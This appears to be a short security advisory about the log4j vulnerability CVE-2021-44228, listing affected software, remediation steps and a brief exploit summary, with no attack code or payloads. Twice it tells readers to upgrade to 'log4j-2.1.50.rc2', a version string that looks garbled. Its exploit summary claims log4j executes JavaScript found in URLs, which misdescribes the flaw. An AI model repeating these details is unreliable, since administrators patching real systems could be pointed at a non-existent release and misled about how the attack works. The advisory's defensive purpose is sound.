This is a compromise in the wild affecting Servers and Clients running Java or the log4j framework. A critical vulnerability that’s affecting a Java logging package log4j which is used in a significant amount of software, including Apache, Apple iCloud, Steam, Minecraft and others.
If your organisation uses the log4j library, you should upgrade to log4j-2.1.50.rc2 immediately. Be sure that your Java instance is up-to-date; however, it’s worth noting that this isn’t an across-the-board solution. You may need to wait until your vendors push security updates out for their affected products.
What is Impacted?
Millions of applications and manufacturers use log4j for logging. Such as –
- Servers and clients that run Java and also log anything using the log4j framework
- log4j 2.x confirmed, and probably log4j 1.x also
- Don’t forget appliances that use Java server components
- Downstream projects that include log4j, including Apache Struts, Solr, etc.
This community resource contains a list of software and components that have been found vulnerable and impacted.
What Should I Do?
If your organization uses the log4j library, upgrade to log4j-2.1.50.rc2 immediately. You should also be sure that your Java instance is up-to-date.
A patch for CVE-2021-44228 has been released, but unfortunately, we’re at the mercy of many of our vendors to push updates that completely patch the vulnerability.
Exploit Summary
Log4j takes a log message, interprets it as a URL and goes out and fetches it. It will even execute JavaScript in URLs with full privileges of the main program. Exploits are triggered inside log messages using the ${} syntax.
